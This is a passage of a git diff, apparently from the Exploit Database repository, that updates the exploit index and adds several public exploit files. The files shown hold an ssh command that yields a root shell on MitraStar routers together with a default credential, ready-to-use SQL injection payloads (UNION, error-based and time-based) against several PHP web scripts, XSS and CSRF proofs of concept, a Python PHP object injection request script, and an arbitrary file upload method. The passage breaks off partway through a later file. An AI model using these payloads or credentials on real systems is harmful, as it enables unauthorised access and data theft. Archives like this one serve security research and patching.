dR.sqL",php,webapps,0 @@ -35542,7 +35543,7 @@ id,file,description,date,author,platform,type,port 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 36490,platforms/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 -36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Open Redirection",2012-01-04,"Mesut Timur",php,webapps,0 +36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Open Redirection",2012-01-04,"Mesut Timur",php,webapps,0 36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' SQL Injection",2011-12-29,SiteWatch,php,webapps,0 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0 @@ -35767,7 +35768,7 @@ id,file,description,date,author,platform,type,port 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 36805,platforms/php/webapps/36805.txt,"WordPress Plugin Community Events 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 -36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Open Redirection",2012-02-18,sonyy,php,webapps,0 +36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Open Redirection",2012-02-18,sonyy,php,webapps,0 36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'get.php?v' Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0 36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'userlogdetail.php?idclient' SQL Injection",2012-02-20,"J. Greil",php,webapps,0 36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 - Cross-Site Scripting Multiple Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0 @@ -36216,7 +36217,7 @@ id,file,description,date,author,platform,type,port 37484,platforms/php/webapps/37484.txt,"WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 37485,platforms/php/webapps/37485.txt,"WordPress Plugin PHPFreeChat - 'url' Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Local File Inclusion",2012-07-06,dun,php,webapps,0 -37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Open Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 +37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Open Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injections",2012-07-09,"Stefan Schurtz",php,webapps,0 37563,platforms/php/webapps/37563.html,"WordPress Plugin G-Lock Double Opt-in Manager - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0 37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Injection",2015-07-05,Vulnerability-Lab,ios,webapps,0 @@ -36251,7 +36252,7 @@ id,file,description,date,author,platform,type,port 37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 37540,platforms/php/webapps/37540.txt,"Joomla! Component Odudeprofile 2.8 - 'profession' SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0 37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0 -37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Open Redirection",2012-07-29,"Aung Khant",php,webapps,0 +37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Open Redirection",2012-07-29,"Aung Khant",php,webapps,0 37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Cross-Site Scripting Multiple Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0 37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",php,webapps,0 37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",cgi,webapps,0 @@ -36406,7 +36407,7 @@ id,file,description,date,author,platform,type,port 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS - 'article.php?id' SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37943,platforms/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0 37944,platforms/php/webapps/37944.txt,"vBSEO - 'u' Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0 -37945,platforms/php/webapps/37945.txt,"Silverstripe CMS 2.4.x - 'BackURL' Open Redirection",2012-10-15,"Aung Khant",php,webapps,0 +37945,platforms/php/webapps/37945.txt,"Silverstripe CMS 2.4.x - 'BackURL' Open Redirection",2012-10-15,"Aung Khant",php,webapps,0 37946,platforms/php/webapps/37946.txt,"WordPress Plugin Crayon Syntax Highlighter - 'wp_load' Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 37801,platforms/hardware/webapps/37801.sh,"Sagemcom F@ST 3864 V2 - Get Admin Password",2015-08-17,"Cade Bull",hardware,webapps,0 37802,platforms/jsp/webapps/37802.html,"IFOBS - 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities",2012-09-15,MustLive,jsp,webapps,0 @@ -38754,3 +38755,45 @@ id,file,description,date,author,platform,type,port 43052,platforms/php/webapps/43052.txt,"FS Realtor Clone - 'id' SQL Injection",2017-10-24,8bitsec,php,webapps,0 43053,platforms/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0 43054,platforms/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0 +43062,platforms/php/webapps/43062.txt,"PHP Melody 2.6.1 - SQL Injection",2017-10-28,"Venkat Rajgor",php,webapps,0 +43063,platforms/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",php,webapps,0 +43064,platforms/php/webapps/43064.txt,"phpMyFAQ 2.9.8 - Cross-Site Request Forgery",2017-10-27,"Nikhil Mittal",php,webapps,0 +43065,platforms/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,php,webapps,0 +43066,platforms/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43067,platforms/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43068,platforms/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43069,platforms/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0 +43070,platforms/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43071,platforms/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43072,platforms/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43073,platforms/php/webapps/43073.txt,"CPA Lead Reward Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43074,platforms/php/webapps/43074.txt,"Basic B2B Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43075,platforms/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43076,platforms/php/webapps/43076.txt,"MyMagazine 1.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43077,platforms/php/webapps/43077.txt,"News 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43078,platforms/php/webapps/43078.txt,"Newspaper 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43079,platforms/php/webapps/43079.txt,"US Zip Codes Database - 'state' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43080,platforms/php/webapps/43080.txt,"Shareet - 'photo' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43081,platforms/php/webapps/43081.txt,"AROX School ERP PHP Script - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43082,platforms/php/webapps/43082.txt,"Protected Links - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43083,platforms/php/webapps/43083.txt,"ZeeBuddy 2x - 'groupid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43084,platforms/php/webapps/43084.txt,"Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43085,platforms/php/webapps/43085.txt,"tPanel 2009 - Authentication Bypass",2017-10-30,"Ihsan Sencan",php,webapps,0 +43086,platforms/php/webapps/43086.txt,"Sokial Social Network Script 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43087,platforms/php/webapps/43087.txt,"SoftDatepro Dating Social Network 1.3 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43088,platforms/php/webapps/43088.txt,"Same Sex Dating Software Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43089,platforms/php/webapps/43089.txt,"PHP CityPortal 2.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43090,platforms/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43091,platforms/php/webapps/43091.txt,"MyBuilder Clone 1.0 - 'subcategory' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43092,platforms/php/webapps/43092.txt,"Mailing List Manager Pro 3.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43093,platforms/php/webapps/43093.txt,"Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43094,platforms/php/webapps/43094.txt,"Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43095,platforms/php/webapps/43095.txt,"Job Board Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43096,platforms/php/webapps/43096.txt,"iTech Gigs Script 1.21 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43097,platforms/php/webapps/43097.txt,"iStock Management System 1.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0 +43098,platforms/php/webapps/43098.txt,"iProject Management System 1.0 - 'ID' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43099,platforms/php/webapps/43099.txt,"Article Directory Script 3.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43100,platforms/php/webapps/43100.txt,"Adult Script Pro 2.2.4 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43101,platforms/php/webapps/43101.txt,"D-Park Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 +43102,platforms/php/webapps/43102.txt,"Ingenious 2.3.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0 +43103,platforms/xml/webapps/43103.py,"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure",2017-10-30,mr_me,xml,webapps,0 diff --git a/platforms/hardware/remote/43061.txt b/platforms/hardware/remote/43061.txt new file mode 100755 index 000000000..669da011f --- /dev/null +++ b/platforms/hardware/remote/43061.txt @@ -0,0 +1,27 @@ +# Exploit Title: Privilege escalation MitraStar routers +# Date: 28-10-2017 +# Exploit Author: j0lama +# Vendor Homepage: http://www.mitrastar.com/ +# Provider Homepage: https://www.movistar.com/ +# Models affected: MitraStar DSL-100HN-T1 and MitraStar GPT-2541GNAC (HGU) +# Software versions: ES_113WJY0b16 (DSL-100HN-T1) and 1.00(VNJ0)b1 (GPT-2541GNAC) +# Vulnerability analysis: http://jolama.es/temas/router-attack/index.php + +Description +----------- +SSH has a bad configuration that allows execute commands when you connect avoiding the default shell that the manufacturer provide us. + +$ ssh 1234@ip /bin/sh + +This give us a shell with root permissions. + +Note: the password for 1234 user is under the router. + +You can copy all file system to your local machine using scp. +In some of the MitraStar routers there is a zyad1234 user with password zyad1234 that have the same permissions of the 1234 user (root). + + +Solution +-------- +In the latest firmware versions this have been fixed. +If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before. diff --git a/platforms/php/webapps/43062.txt b/platforms/php/webapps/43062.txt new file mode 100755 index 000000000..5d66a0703 --- /dev/null +++ b/platforms/php/webapps/43062.txt @@ -0,0 +1,18 @@ +################################################### +[+] Author : Venkat Rajgor +[+] Email : Venki9990@gmail.com +[+] Vulnerability : SQL injection +################################################### +E-mail ID : support@phpsugar.com +Download : http://www.phpsugar.com +Web : http://www.phpsugar.com +Price : $39 USD +################################################### +Vulnerable parameter: http://x.x.x.x/playlists.php?playlist= +Application : PHPSUGAR PHP Melody version 2.6.1 +Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection +################################################### + +Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php. + +Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- - \ No newline at end of file diff --git a/platforms/php/webapps/43063.txt b/platforms/php/webapps/43063.txt new file mode 100755 index 000000000..91cd6fcaf --- /dev/null +++ b/platforms/php/webapps/43063.txt @@ -0,0 +1,41 @@ +# Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability +# Date: 28-9-2017 +# Exploit Author: Nikhil Mittal (Payatu Labs) +# Vendor Homepage: http://www.phpmyfaq.de/ +# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip +# Version: 2.9.8 +# Tested on: MAC OS +# CVE : 2017-15727 + +1. Description + +In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment. + +2. Proof of concept + +Exploit code + + + + + XSS EXPLOIT + + + + + + + + +Steps to reproduce: + +1. Create a user having limited access rights to attachment section +2. Goto http://localhost/phpmyfaq/admin/?action=editentry +2. Upload the exploit code with .html extension at the place of attachements +3. Access the file url generated at /phpmyfaq/attachments/ +4. Reach to last file using directory traversal and XSS will triage + +3. Solution + +Update to phpMyFAQ Version 2.9.9 +http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip diff --git a/platforms/php/webapps/43064.txt b/platforms/php/webapps/43064.txt new file mode 100755 index 000000000..042118eed --- /dev/null +++ b/platforms/php/webapps/43064.txt @@ -0,0 +1,29 @@ +# Exploit Title: phpMyFAQ 2.9.8 CSRF Vulnerability +# Date: 27-9-2017 +# Exploit Author: Nikhil Mittal (Payatu Labs) +# Vendor Homepage: http://www.phpmyfaq.de/ +# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip +# Version: 2.9.8 +# Tested on: MAC OS +# CVE : 2017-15730 + +1. Description + +In phpMyFAQ before 2.9.8, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php. + +2. Proof of concept + + + + PHPMYSQL CSRF EXPLOIT + + + EXPLOIT! + + + + +3. Solution + +Update to phpMyFAQ Version 2.9.9 +http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip \ No newline at end of file diff --git a/platforms/php/webapps/43065.py b/platforms/php/webapps/43065.py new file mode 100755 index 000000000..4a824f83e --- /dev/null +++ b/platforms/php/webapps/43065.py @@ -0,0 +1,66 @@ +# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection] +# Google Dork: [NA] +# Date: [Okt 30 2017] +# Exploit Author: [tomplixsee] +# Author blog : [cupuzone.wordpress.com] +# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/] +# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/] +# Version: [<= 4.2.24] +# Tested on: [Ubuntu Server 16.04] +# CVE : [NA] + +tested on app version 4.2.23, 4.2.24 + +we can send an evil cookie (login not required) to vulnerable function +1. vulnerable code on Functions/Process_Ajax.php <= tested + + 203 // Adds an item to the plugin's cart + 204 function UPCP_Add_To_Cart() { + 205 global $woocommerce; + 206 global $wpdb; + 207 global $items_table_name; + 208 + 209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout"); + 210 + 211 if ($WooCommerce_Checkout == "Yes") { + 212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID']))); + 213 echo "WC ID: " . $WC_Prod_ID . "
"; + 214 $woocommerce->cart->add_to_cart($WC_Prod_ID); + 215 } + 216 + 217 if (isset($_COOKIE['upcp_cart_products'])) { + 218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products'])); + 219 } + 220 else { + 221 $Products_Array = array(); + 222 } + 223 + 224 $Products_Array[] = $_POST['prod_ID']; + 225 $Products_Array = array_unique($Products_Array); + 226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/"); + 227 } + 228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart'); + 229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' ); + +2. vulnerable code on Functions/Shortcodes.php <= not tested + +POC +1. use a WP plugin to test php object injection, +like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/ + +2. make a request +#----------------------------------- +#! /usr/bin/python +import requests +url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?"; +data = {'action':'upcp_add_to_cart'} +headers = { +'Content-type': 'application/x-www-form-urlencoded', +'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', +'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}' +} +r = requests.post(url, data=data, headers=headers) + +print r.content + +#------------------------------------ \ No newline at end of file diff --git a/platforms/php/webapps/43066.txt b/platforms/php/webapps/43066.txt new file mode 100755 index 000000000..8fea852e4 --- /dev/null +++ b/platforms/php/webapps/43066.txt @@ -0,0 +1,40 @@ +# # # # # +# Exploit Title: Zomato Clone Script - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script +# Demo: http://jhinstitute.com/demo/foodpanda/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15993 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/restaurant-menu.php?resid=[SQL] +# +# -539'+++/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x3132,0x3133,0x3134--+- +# +# Parameter: resid (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) +# Payload: resid=-9239 OR 3532=3532# +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: resid=539 AND SLEEP(5) +# +# Type: UNION query +# Title: MySQL UNION query (87) - 10 columns +# Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87# +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/43067.txt b/platforms/php/webapps/43067.txt new file mode 100755 index 000000000..fdd664c54 --- /dev/null +++ b/platforms/php/webapps/43067.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: Website Broker Script - 'status_id' Parameter SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link: http://www.exclusivescript.com/product/UwCG4464436/php-scripts/website-broker-script +# Demo: http://www.officialwebsiteforsale.com/official/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15992 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/status_list.php?status_id=[SQL] +# +# -12'++/*!50000UNION*/+/*!50000SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--+- +# +# Parameter: status_id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: status_id=12' AND 2717=2717 AND 'fNVA'='fNVA +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 5 columns +# Payload: status_id=-1351' UNION ALL SELECT NULL,CONCAT(0x71716b7a71,0x4857455572714d7a48506145547643734d6b794f515a506d6469764f5666736c6d754c7468444178,0x716a6b6271),NULL,NULL,NULL-- AJcv +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43068.txt b/platforms/php/webapps/43068.txt new file mode 100755 index 000000000..d31de72b6 --- /dev/null +++ b/platforms/php/webapps/43068.txt @@ -0,0 +1,66 @@ +# # # # # +# Exploit Title: Vastal I-Tech Agent Zone - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://vastal.com/ +# Software http://vastal.com/agent-zone-real-estate-script.html +# Demo: http://agentzone.vastal.com/demo/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15991 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/searchCommercial.php?property_type=[SQL]&city=[SQL]&posted_by=[SQL] +# +# http://localhost/[PATH]/searchResidential.php?property_type=[SQL]&city=[SQL]&bedroom=[SQL] +# +# Parameter: city (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) +# Payload: property_type=&city=-5275 OR 1703=1703#&posted_by= +# +# Type: error-based +# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) +# Payload: property_type=&city=-1769 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (2860=2860) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&posted_by= +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 time-based blind - Parameter replace +# Payload: property_type=&city=(CASE WHEN (9487=9487) THEN SLEEP(5) ELSE 9487 END)&posted_by= +# +# Parameter: posted_by (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) +# Payload: property_type=&city=&posted_by=-5550 OR 1335=1335# +# +# Type: error-based +# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) +# Payload: property_type=&city=&posted_by=-9423 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (4134=4134) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)# +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 time-based blind - Parameter replace +# Payload: property_type=&city=&posted_by=(CASE WHEN (3754=3754) THEN SLEEP(5) ELSE 3754 END) +# +# Parameter: property_type (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) +# Payload: property_type=-8633 OR 6527=6527#&city=&posted_by= +# +# Type: error-based +# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) +# Payload: property_type=-4342 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (3911=3911) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&city=&posted_by= +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 time-based blind - Parameter replace +# Payload: property_type=(CASE WHEN (2911=2911) THEN SLEEP(5) ELSE 2911 END)&city=&posted_by= +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43069.txt b/platforms/php/webapps/43069.txt new file mode 100755 index 000000000..b9bb0fb44 --- /dev/null +++ b/platforms/php/webapps/43069.txt @@ -0,0 +1,53 @@ +# # # # # +# Exploit Title: Php Inventory & Invoice Management System - Arbitrary File Upload +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://savsofteproducts.com/ +# Software Link: http://www.phpinventory.com/ +# Demo: http://phpinventory.com/phpinventory_demo/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15990 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# +# The vulnerability allows an users upload arbitrary file.... +# +# Vulnerable Source: +# +# .............1 +# if($_FILES['userfile']['name']!=''){ +# $target = 'images/user_pics/'; +# $targets = $target . basename( $_FILES['userfile']['name']); +# $docadd=($_FILES['userfile']['name']); +# if(move_uploaded_file($_FILES['userfile']['tmp_name'], $targets)) +# { +# $pfilename=$_FILES['userfile']['name']; +# $filename=time().$pfilename; +# $new_path=$target.$filename; +# rename($targets,$new_path); +# } +# +#}else{ +#$filename=$_POST['user_picname']; +#} +# .............2,3,4 +# $target = 'images/logo/'; +# $target = 'images/product_images/'; +# $target = 'images/service_providers/'; +# Etc.. +# ............. +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php/dashboard/edit_myaccountdetail/ +# +# http://localhost/[PATH]/images/user_pics/[...].php +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43070.txt b/platforms/php/webapps/43070.txt new file mode 100755 index 000000000..a85ffd732 --- /dev/null +++ b/platforms/php/webapps/43070.txt @@ -0,0 +1,40 @@ +# # # # # +# Exploit Title: Online Exam Test Application - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link: http://www.exclusivescript.com/product/1z2e4672468/php-scripts/online-exam-test-application +# Demo: http://198.38.86.159/~onlineexamboard/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15989 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/resources.php?action=category&sort=[SQL] +# +# -8++/*!07777UNION*/+/*!07777SELECT*/+0x31,0x32,0x496873616e2053656e63616e,(/*!07777Select*/+export_set(5,@:=0,(/*!07777select*/+count(*)/*!07777from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!07777table_name*/,0x3c6c693e,2),/*!07777column_name*/,0xa3a,2)),@,2))--+- +# +# Parameter: sort (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: action=category&sort=8 AND 5525=5525 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: action=category&sort=8 AND SLEEP(5) +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 4 columns +# Payload: action=category&sort=8 UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,0x77654f6a51797a6c7755546b54574f68467842734c4268517654667a6e584e63634871574f4f454e,0x716b766a71),NULL-- Yhyw +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43071.txt b/platforms/php/webapps/43071.txt new file mode 100755 index 000000000..eb483acae --- /dev/null +++ b/platforms/php/webapps/43071.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: Nice PHP FAQ Script - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: 